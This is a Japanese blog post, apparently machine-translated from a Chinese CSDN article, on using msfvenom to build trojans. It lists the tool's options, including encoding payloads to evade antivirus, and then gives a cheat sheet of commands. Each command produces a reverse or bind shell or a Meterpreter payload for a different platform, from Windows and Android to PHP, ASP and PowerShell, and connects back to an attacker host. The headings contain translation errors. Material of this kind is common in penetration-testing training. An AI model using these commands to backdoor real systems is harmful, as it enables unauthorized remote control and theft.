さまざまな環境での MSFVenom トロイの木馬の生成

        msfvenom: msfpayload と msfencode の組み合わせです。msfvenom を使用して、トロイの木馬プログラムを生成し、ターゲット マシン上で実行できます。ローカル監視およびオンラインでトロイの木馬を生成するためによく使用されます。ターゲット マシンおよびオンラインで実行されます。ローカル マシン Kali では、リバウンド シェルに似ています。MSFVenom は 2 種類の攻撃ペイロードを生成できます。

1. ペイロード: ペイロードには、攻撃がターゲット ホストに侵入した後にリモート システムで実行する必要がある悪意のあるプログラムが含まれています。Metasploit では、ペイロードはエクスプロイト モジュールとして実行できる特別なモジュールであり、システムのセキュリティ脆弱性を悪用できます。ターゲットシステムへの攻撃を実行します。つまり、このエクスプロイト モジュールはターゲット システムへのアクセスを提供し、そのモジュール内のコードはターゲット システムのペイロードの動作を定義します。


2. シェルコード: シェルコードは、ペネトレーション攻撃中に攻撃ペイロードとして実行されるペイロード内の一連の機械命令です。シェルコードは通常、アセンブリ言語で記述されます。ほとんどの場合、コマンド ライン シェルは、ターゲット システムがシェルコードの命令セットを実行した後に提供されます。

Msfvenomの使用法:

  •  Msfvenom が提供するヘルプ手順を表示します。

いくつかのパラメータの紹介:

-p, --payload 指定需要使用的payload。使用自定义的payload,请使用-;或者stdin指定

-l, --list 列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops, all

-n, --nopsled 为payload预先指定一个NOP滑动长度

-f, --format 指定输出格式

-e, --encoder 指定需要使用的编码

-a, --arch 指定payload的目标架构 x64 x86

  -–platform 指定payload的目标平台

-s, --space 设定有效攻击荷载的最大长度

-b, --bad-chars 设定规避字符集,比如: & #039;\x00\xff& #039;

-i, --iterations 指定payload的编码次数,绕杀毒

-c, --add-code 指定一个附加的win32 shellcode文件

-x, --template 指定一个自定义的可执行文件作为模板

-k, --keep 保护模板程序的动作,注入的payload作为一个新的进程运行

–payload-options 列举payload的标准选项

-o, --out 将payload保存到指定的文件路径

-v, --var-name 指定一个自定义的变量,以确定输出格式

–shellest 最小化生成payload

MSFVenom は、次の形式での実行可能ファイルの生成をサポートしています。

asp, aspx, aspx-exe, axis2, dll, elf, elf-so, exe, exe-only, exe-service, exe-small, hta-psh, jar, vba, vba-exe, vba-psh, vbs, war, loop-vbs, macho, msi, msi-nouac, osx-app, psh, psh-net, psh-reflection, psh-cmd

さまざまな環境での生成方法:

リバウンドシェルを生成する方法は以下のとおりです。フォワード接続の場合は「bind_tcp」などを使用します。


ノースカロライナ:

# nc正向
msfvenom -p windows/shell_hidden_bind_tcp LHOST=<IP> LPORT=<PORT>  -f exe> shell.exe

# nc反向
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT>  -f exe> shell.exe

ウィンドウズ:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell.exe

Linux:

# x86 自己根据情况调整
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -e -f elf -a x86 --platform linux -o shell

マック: 

msfvenom -p osx/x86/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f macho > shell.macho

.c を生成するシェルコードを指定します。

msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -b "\x00\x0a\x0d" -a x86 --platform win -f c

 リバウンド Python シェル:

msfvenom -p cmd/unix/reverse_python LHOST=<IP> LPORT=<PORT> -f raw > myshell.py

リバウンド ASP シェル: 

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f asp > shell.asp

or

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f asp -a x86 --platform win -o shell.asp

PHP シェルをバウンスする: 

msfvenom -p php/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > myshell.php

リバウンドバッシュシェル: 

msfvenom -p cmd/unix/reverse_bash LHOST=<IP> LPORT=<PORT> -o shell.sh

ジャバ:

msfvenom --payload="java/meterpreter/reverse_tcp" LHOST=<IP> LPORT=<PORT> -f jar > java_meterpreter_reverse_tcp.jar

アンドロイド:

msfvenom -p android/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> R > shell.apk

パワーシェル:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f psh-reflection >5555.ps1

うなずき:

msfvenom -p nodejs/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw -o shell.js

パール: 

msfvenom -p cmd/unix/reverse_perl LHOST=<IP> LPORT=<PORT> -f raw > shell.pl

 ルビィ: 

msfvenom -p ruby/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw -o shell.rb

 参考: offsecの概要

おすすめ

転載: blog.csdn.net/oiadkt/article/details/129416658